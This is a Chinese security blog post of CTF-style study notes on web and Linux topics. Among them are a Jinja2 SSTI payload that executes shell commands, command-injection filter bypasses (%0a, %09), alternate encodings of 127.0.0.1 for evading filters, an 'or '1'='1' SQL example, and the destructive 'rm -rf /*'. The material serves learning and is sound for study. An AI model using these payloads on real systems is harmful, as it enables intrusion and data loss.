<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="MIME是什么?MIME意为多功能Internet邮件扩展，它设计的最初目的是为了在发送电子邮件时附加多媒体数据，让邮件客户程序能根据其类型进行处理。 文件后缀名在网页上并没有明确的意义。 因此，使服务器设置正确的传输类型非常重要，所以正确的MIME类型与每个文件一同传输给服务器。在网络资源进行连接时，浏览器经常使用MIME类型来决定执行何种默认行为。 是设定某种扩展名的文件用一种应用程序来打开的">
<meta property="og:type" content="article">
<meta property="og:title" content="一些小知识">
<meta property="og:url" content="http://example.com/2022/03/12/%E6%9D%82%E9%A1%B9/%E4%B8%80%E4%BA%9B%E5%B0%8F%E7%9F%A5%E8%AF%86/index.html">
<meta property="og:site_name" content="tw0的小站">
<meta property="og:description" content="MIME是什么?MIME意为多功能Internet邮件扩展，它设计的最初目的是为了在发送电子邮件时附加多媒体数据，让邮件客户程序能根据其类型进行处理。 文件后缀名在网页上并没有明确的意义。 因此，使服务器设置正确的传输类型非常重要，所以正确的MIME类型与每个文件一同传输给服务器。在网络资源进行连接时，浏览器经常使用MIME类型来决定执行何种默认行为。 是设定某种扩展名的文件用一种应用程序来打开的">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-03-12T04:35:19.240Z">
<meta property="article:modified_time" content="2022-03-12T04:57:45.119Z">
<meta property="article:author" content="tw0_one">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/03/12/%E6%9D%82%E9%A1%B9/%E4%B8%80%E4%BA%9B%E5%B0%8F%E7%9F%A5%E8%AF%86/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>一些小知识 | tw0的小站</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="tw0的小站" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">tw0的小站</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">极简主义</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于我</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/12/%E6%9D%82%E9%A1%B9/%E4%B8%80%E4%BA%9B%E5%B0%8F%E7%9F%A5%E8%AF%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="tw0_one">
      <meta itemprop="description" content="山河远阔，人间星河">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tw0的小站">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一些小知识
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-03-12 12:35:19 / 修改时间：12:57:45" itemprop="dateCreated datePublished" datetime="2022-03-12T12:35:19+08:00">2022-03-12</time>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="MIME是什么"><a href="#MIME是什么" class="headerlink" title="MIME是什么?"></a>MIME是什么?</h2><p><code>MIME</code>意为多功能<code>Internet</code>邮件扩展，它设计的最初目的是为了在发送电子邮件时附加多媒体数据，让邮件客户程序能根据其类型进行处理。</p>
<p>文件后缀名在网页上并没有明确的意义。 因此，使服务器设置正确的传输类型非常重要，所以正确的<code>MIME</code>类型与每个文件一同传输给服务器。在网络资源进行连接时，浏览器经常使用<code>MIME</code>类型来决定执行何种默认行为。</p>
<p>是设定某种扩展名的文件用一种应用程序来打开的方式类型，当该扩展名文件被访问的时候，浏览器会<strong>自动使用</strong>指定应用程序来打开。多用于指定一些客户端<strong>自定义</strong>的文件名，以及一些媒体文件打开方式。</p>
<h3 id="MIME嗅探"><a href="#MIME嗅探" class="headerlink" title="MIME嗅探"></a>MIME嗅探</h3><p>在缺失<code> MIME</code> 类型或客户端认为文件设置了错误的 <code>MIME</code> 类型时，浏览器可能会通过查看资源来进行<code>MIME</code>嗅探。每一个浏览器在不同的情况下会执行不同的操作。因为这个操作会有一些安全问题，有的 <code>MIME </code>类型表示可执行内容而有些是不可执行内容。浏览器可以通过请求头 <code>Content-Type</code> 来设置 <code>X-Content-Type-Options</code> 以阻止<code>MIME</code>嗅探。</p>
<h2 id="robots协议？"><a href="#robots协议？" class="headerlink" title="robots协议？"></a>robots协议？</h2><p><code>robots</code>协议也叫<code>robots.txt</code>（统一小写）是一种存放于网站根目录下的ASCII编码的文本文件，它通常告诉网络搜索引擎的漫游器（又称网络蜘蛛），此网站中的哪些内容是不应被搜索引擎的漫游器获取的，哪些是可以被漫游器获取的。因为一些系统中的URL是大小写敏感的，所以<code>robots.txt</code>的文件名应统一为<strong>小写</strong>。<code>robots.txt</code>应放置于网站的根目录下。</p>
<p><strong><code>robots</code>协议并不是一个规范，而只是约定俗成的，所以并不能保证网站的隐私。</strong></p>
<h2 id="后缀为-phps的文件是什么？"><a href="#后缀为-phps的文件是什么？" class="headerlink" title="后缀为.phps的文件是什么？"></a>后缀为.phps的文件是什么？</h2><p><code>phps</code>文件是php的源代码文件，通常用于提供给用户（访问者）查看php代码，因为用户无法直接通过Web浏览器看到php文件的内容，所以需要用<code>phps</code>文件代替。(其实，只要不用php等已经在服务器中注册过的MIME类型为文件即可，但为了国际通用，所以才用了<code>phps</code>文件类型。)</p>
<p>但并不是所有php文件都有<code>.phps</code>后缀文件</p>
<h2 id="htaccess文件是什么？"><a href="#htaccess文件是什么？" class="headerlink" title=".htaccess文件是什么？"></a>.htaccess文件是什么？</h2><p><code>.htaccess</code>是一个配置文件(纯文本文件)，里面存放着<code>Apache</code>服务器配置相关的一些指令，它类似于Apache的站点配置文件，如<code>httpd.conf</code>（<code>Apache2</code>已经支持多站点，因此你的站点配置文件可能在<code>/etc/apache2/conf.d/</code>目录下）。</p>
<p><code>.htaccess</code>与<code>httpd.conf</code>配置文件不同的是，它只作用于当前目录。另外<code>httpd.conf</code>是在<code>Apache</code>服务启动的时候就加载的，而<code>.htaccess</code>只有在用户访问目录时加载，开销大、速度慢。</p>
<p>既然如此，为什么我们还要用<code>.htaccess</code>呢？因为它配置起来简单，它还支持网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能，另外它管理起来很方便，可以很好适应网站迁移。</p>
<h2 id="Tor浏览器"><a href="#Tor浏览器" class="headerlink" title="Tor浏览器"></a>Tor浏览器</h2><p>一款是你匿名访问网络的的软件。用户通过<code>Tor</code>可以在因特网上进行匿名交流。(基于火狐浏览器的浏览器)，后缀为<code>onion</code>的网站需要用此浏览器访问。</p>
<p>为了实现匿名目的，<code>Tor</code>把分散在全球的计算机集合起来形成一个加密回路。当你通过<code>Tor</code>网络访问互联网时，你的网络数据会通过多台电脑迂回发送，就像洋葱包裹其核心那样掩饰你的网络活动，信息传输在每一步都被加密，无从得知你所处位置和信息传输目的地。因此<code>Tor Browser</code>也被称为洋葱浏览器。</p>
<h2 id="移位计算的一个特殊值"><a href="#移位计算的一个特殊值" class="headerlink" title="移位计算的一个特殊值"></a>移位计算的一个特殊值</h2><p>125&lt;&lt;3 = 1000</p>
<p>0111 1101 &lt;&lt; 后为 0011 1110 1000 的十进制为1000</p>
<p>同理8000&gt;&gt;3 =1000</p>
<table>
<thead>
<tr>
<th>HEX</th>
<th>3E8</th>
</tr>
</thead>
<tbody><tr>
<td>DEC</td>
<td>1,000</td>
</tr>
<tr>
<td>OCT</td>
<td>1750</td>
</tr>
<tr>
<td>BIN</td>
<td>0011 1110 1000</td>
</tr>
</tbody></table>
<h2 id="删库跑路-rm-rf"><a href="#删库跑路-rm-rf" class="headerlink" title="删库跑路  rm -rf /*"></a>删库跑路  rm -rf /*</h2><p><code>rm </code>命令可以删除一个目录中的一个或多个文件或目录，也可以将某个目录及其下属的所有文件及其子目录均删除掉</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>作用</th>
</tr>
</thead>
<tbody><tr>
<td>-f</td>
<td>强制删除文件或目录</td>
</tr>
<tr>
<td>-i</td>
<td>删除已有文件或目录之前先询问用户</td>
</tr>
<tr>
<td>-r</td>
<td>递归处理， 将指定目录下的所有文件与子目录一并处理</td>
</tr>
<tr>
<td>/</td>
<td>在Linux中表示根目录</td>
</tr>
<tr>
<td>*</td>
<td>所有文件</td>
</tr>
<tr>
<td>/*</td>
<td>根目录下的所有文件</td>
</tr>
</tbody></table>
<p>而<code>mv</code>命令是用来移动文件或者将文件改名，备份文件或者目录。</p>
<h2 id="Linux系统中的反引号"><a href="#Linux系统中的反引号" class="headerlink" title="Linux系统中的反引号"></a>Linux系统中的反引号</h2><p>在<code>linux</code>中反引号的作用就是将反引号内的<code>Linux</code>命令先执行，然后将执行结果赋予变量。<br> 比如<code> cat \</code>ls` <code>相当于将 </code>ls<code>出来的结果</code>cat`。</p>
<h2 id="jsfuck"><a href="#jsfuck" class="headerlink" title="jsfuck"></a>jsfuck</h2><p><code>jsfuck</code>源于一门编程语言<code>brainfuck</code>，其主要的思想就是只使用8种特定的符号来编写代码。而<code>jsfuck</code>也是沿用了这个思想，它仅仅使用6种符号来编写代码。它们分别是(、)、+、[、]、!。(用6个字符输出任意<code>JavaScript</code>)</p>
<h2 id="sha1碰撞"><a href="#sha1碰撞" class="headerlink" title="sha1碰撞"></a>sha1碰撞</h2><p>这两个值<code>a</code>和<code>b</code>值不同但是<code>sha1</code>值相同</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1</span><br></pre></td></tr></table></figure>

<h2 id="127-0-0-1的各种进制，一般利用十进制绕过"><a href="#127-0-0-1的各种进制，一般利用十进制绕过" class="headerlink" title="127.0.0.1的各种进制，一般利用十进制绕过"></a>127.0.0.1的各种进制，一般利用十进制绕过</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1:</span><br><span class="line">八进制：0177.0.0.1</span><br><span class="line">十六进制：0x7f.0.0.1</span><br><span class="line">十进制：2130706433</span><br></pre></td></tr></table></figure>

<h2 id="ssit官方漏洞利用"><a href="#ssit官方漏洞利用" class="headerlink" title="ssit官方漏洞利用"></a>ssit官方漏洞利用</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c in [].<span class="keyword">__class__</span>.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> c.__name__ == <span class="string">&#x27;catch_warnings&#x27;</span> %&#125;</span><br><span class="line">  &#123;% <span class="keyword">for</span> b in c.__init__.__globals__.values() %&#125;</span><br><span class="line">  &#123;% <span class="keyword">if</span> b.<span class="keyword">__class__</span> == &#123;&#125;.<span class="keyword">__class__</span> %&#125;</span><br><span class="line">    &#123;% <span class="keyword">if</span> <span class="string">&#x27;eval&#x27;</span> in b.keys() %&#125;</span><br><span class="line">      &#123;&#123; b[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&#x27;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&#x27;</span>) &#125;&#125;         <span class="comment">//poppen的参数就是要执行的命令</span></span><br><span class="line">    &#123;% <span class="keyword">endif</span> %&#125;</span><br><span class="line">  &#123;% <span class="keyword">endif</span> %&#125;</span><br><span class="line">  &#123;% <span class="keyword">endfor</span> %&#125;</span><br><span class="line">&#123;% <span class="keyword">endif</span> %&#125;</span><br><span class="line">&#123;% <span class="keyword">endfor</span> %&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Linux能打开文件的命令"><a href="#Linux能打开文件的命令" class="headerlink" title="Linux能打开文件的命令"></a>Linux能打开文件的命令</h2><ul>
<li><p><code>cat</code> 由第一行开始显示内容，并将所有内容输出</p>
</li>
<li><p><code>tac</code> 从最后一行倒序显示内容，并将所有内容输出</p>
</li>
<li><p><code>more</code> 根据窗口大小，一页一页的显示文件内容</p>
</li>
<li><p><code>less</code> 和<code>more</code>相似，但其优点可以往前翻页，并且进行可以搜索字符(使用<code>q</code>或者<code>ctrl</code>+<code>z</code>退出，<code>j</code>下一行,<code>k</code>上一行)</p>
</li>
<li><p><code>head</code> 只显示头几行</p>
</li>
<li><p><code>tail</code> 只显示最后几行</p>
</li>
<li><p><code>nl</code> 类似于cat -n，显示时输出行号</p>
</li>
<li><p><code>tailf</code> 类似于<code>tail -f</code></p>
</li>
<li><p><code>sed</code> 使用<code>sed -n &#39;p&#39; 1.txt</code>来打开文件，如果使用<code>sed &#39;p&#39; 1.txt</code>每一行会输出两次</p>
</li>
<li><p><code>sort</code> 将文件进行排序，并将排序结果标准输出</p>
</li>
<li><p><code>uniq</code> 用于报告会忽略文件中的重复行</p>
</li>
<li><p><code>rev</code> 将文件中的每行内容以字符为单位<strong>反序</strong>输出</p>
</li>
<li><p><code>cut</code> 使用<code>cut -c 1- 1.txt</code> 打卡文件 <code>1-</code>是用于指定起始位置和结束位置的，单写一个表示切割那个位置上的数并输出(从1开始)，这里的<code>1-</code>表示，从1开始到末尾</p>
</li>
<li><p><code>awk</code> 文本和数据进行处理的编程语言，使用<code>awk &#39;&#123;print&#125;&#39; 1.txt</code>打卡文件</p>
</li>
<li><p><code>stings</code> 在对象文件或二进制文件中查找可打印的字符串(可用于打卡<code>.c</code>后缀的文件)</p>
</li>
<li><p><code>od</code> 输出文件的八进制，十六进制等格式编码的字节，使用<code>od -c 1.txt</code>打开文件</p>
</li>
<li><p><code>paste</code> 用于将多个文件按照队列进行合并。可用于读取文件</p>
</li>
<li><p><code>diff</code> 比较给定两个文件的不同，可用于读取数据<code>diff 1.txt 2.txt</code></p>
</li>
<li><p><code>curl</code> 使用<code>file:///xxx/xxx.txt</code>可读取文件</p>
</li>
<li><p><code>bzmore</code> 查看<code>bzip2</code>压缩过的文本文件的内容</p>
</li>
<li><p><code>bzless</code> 是增强<code>.bz2</code>压缩包查看器，<code>bzless</code>比<code>bzmore</code>命令功能更强大</p>
</li>
</ul>
<h2 id="两个-和三个-的区别"><a href="#两个-和三个-的区别" class="headerlink" title="两个==和三个===的区别"></a>两个==和三个===的区别</h2><ul>
<li><p><code>==</code> 两边值类型不同的时候，要先进行类型转换，再比较。</p>
<p>所以在<code>==</code>双等号的比较中以<code>0e</code>开头的都会转化成科学计数法。而科学计数法中<code>0</code>乘任何数都是0。</p>
</li>
<li><p><code>===</code> 不做类型转换，类型不同的一定不等。</p>
</li>
</ul>
<h2 id="0day"><a href="#0day" class="headerlink" title="0day"></a>0day</h2><p><strong>网络安全</strong>意思上的<code>0day</code>就是指一些没有公布补丁的漏洞，或者是还没有被漏洞发现者公布出来的漏洞利用工具，由于这种漏洞的利用程序对网络安全都具有巨大威胁，因此<code>0day</code>也成为黑客的最爱。</p>
<h2 id="sql语句中and和or的优先级"><a href="#sql语句中and和or的优先级" class="headerlink" title="sql语句中and和or的优先级"></a>sql语句中and和or的优先级</h2><p>例如:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">where</span> username<span class="operator">=</span><span class="string">&#x27;admin&#x27;</span> <span class="keyword">or</span> <span class="string">&#x27;1&#x27;</span><span class="operator">=</span><span class="string">&#x27;1&#x27;</span> <span class="keyword">and</span> password<span class="operator">=</span><span class="string">&#x27;1&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>这里<code>and</code>的优先级高于<code>or</code>，所以是先判断<code>&#39;1&#39;=&#39;1&#39;</code>和<code>password=&#39;1&#39;</code>为假，但<code>admin</code>为真，所以整体为真。</p>
<h2 id="什么是分布式"><a href="#什么是分布式" class="headerlink" title="什么是分布式"></a>什么是分布式</h2><p>分布式是指通过网络连接的多个组件，通过交换信息协作而形成的系统。分布式不一定就是不同的组件，同一个组件也可以，关键在于是否通过交换信息的方式进行协作。</p>
<p>集群，是指同一种组件的多个实例，形成的逻辑上的整体。分布式系统也可以是一个集群。</p>
<h2 id="什么是IIS"><a href="#什么是IIS" class="headerlink" title="什么是IIS"></a>什么是IIS</h2><p><code>IIS</code>全称是互联网信息服务，是一种<code>Web</code>（网页）服务组件，其中包括<code>Web</code>服务器、<code>FTP</code>服务器、<code>NNTP</code>服务器和<code>SMTP</code>服务器，分别用于网页浏览、文件传输、新闻服务和邮件发送等方面，它使得在网络（包括互联网和局域网）上发布信息成了一件很容易的事。</p>
<h2 id="管道符"><a href="#管道符" class="headerlink" title="管道符"></a>管道符</h2><p>系统支持的管道符如下(<code>Linux</code>和<code>windows</code>一样)：</p>
<ol>
<li><code>;</code>：执行完前面的语句再执行后面的语句。</li>
<li><code>|</code>：显示后面语句的执行结果。</li>
<li><code>||</code>：当前面的语句执行出错时，执行后面的语句。</li>
<li><code>&amp;</code>：两条命令都执行，如果前面的语句为假则执行执行后面的语句，前面的语句可真可假。</li>
<li><code>&amp;&amp;</code>：如果前面的语句为假则直接出错，也不执行后面的语句，前面的语句为真则两条命令都执行，前面的语句只能为真。</li>
</ol>
<ul>
<li><p>禁用了<code>;</code>，<code>|</code>，<code>&amp;</code>可以使用换行符的<code>url</code>编码(<code>%0a</code>)来绕过(相当于直接执行下一题命令)。</p>
</li>
<li><p>禁用空格(<code>%20</code>)可以使用制表符(<code>tab</code>)的<code>url</code>编码<code>%09</code>来绕过。</p>
</li>
<li><p>禁用了<code>/</code>可以先用<code>cd</code>进入文件。</p>
</li>
</ul>
<h2 id="Exp、PoC、Webshell和payload的区分"><a href="#Exp、PoC、Webshell和payload的区分" class="headerlink" title="Exp、PoC、Webshell和payload的区分"></a>Exp、PoC、Webshell和payload的区分</h2><p>PoC(全称: Proof of Concept): 一般是我们对于漏洞的判断，即<strong>目标系统是否存在漏洞</strong>。</p>
<p>Exp(全称: Exploit，漏洞利用程序）: 对已知或已发现的漏洞<strong>进行利用</strong>。</p>
<p>payload(意为“攻击载荷”): 攻击载荷是我们期望目标系统在<strong>被渗透攻击之后去执行的代码</strong>。</p>
<p>Webshell就是一个脚本，是以asp、php、jsp或者cgi等网页文件形式存在的，可以对web服务器进行操作的权限。</p>

    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="tw0_one 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="tw0_one 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>tw0_one
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/03/12/%E6%9D%82%E9%A1%B9/%E4%B8%80%E4%BA%9B%E5%B0%8F%E7%9F%A5%E8%AF%86/" title="一些小知识">http://example.com/2022/03/12/杂项/一些小知识/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/02/26/%E6%9D%82%E9%A1%B9/tw0/%E9%80%9A%E7%94%A8%E6%80%A7%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95/%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%94%BB%E5%87%BB%E6%96%B9%E5%90%91/" rel="prev" title="常见端口及攻击方向">
      <i class="fa fa-chevron-left"></i> 常见端口及攻击方向
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/03/12/%E6%9D%82%E9%A1%B9/%E7%89%B9%E6%AE%8A%E7%9A%84md5%E5%80%BC/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#MIME%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">1.</span> <span class="nav-text">MIME是什么?</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#MIME%E5%97%85%E6%8E%A2"><span class="nav-number">1.1.</span> <span class="nav-text">MIME嗅探</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#robots%E5%8D%8F%E8%AE%AE%EF%BC%9F"><span class="nav-number">2.</span> <span class="nav-text">robots协议？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%8E%E7%BC%80%E4%B8%BA-phps%E7%9A%84%E6%96%87%E4%BB%B6%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="nav-number">3.</span> <span class="nav-text">后缀为.phps的文件是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#htaccess%E6%96%87%E4%BB%B6%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="nav-number">4.</span> <span class="nav-text">.htaccess文件是什么？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Tor%E6%B5%8F%E8%A7%88%E5%99%A8"><span class="nav-number">5.</span> <span class="nav-text">Tor浏览器</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" 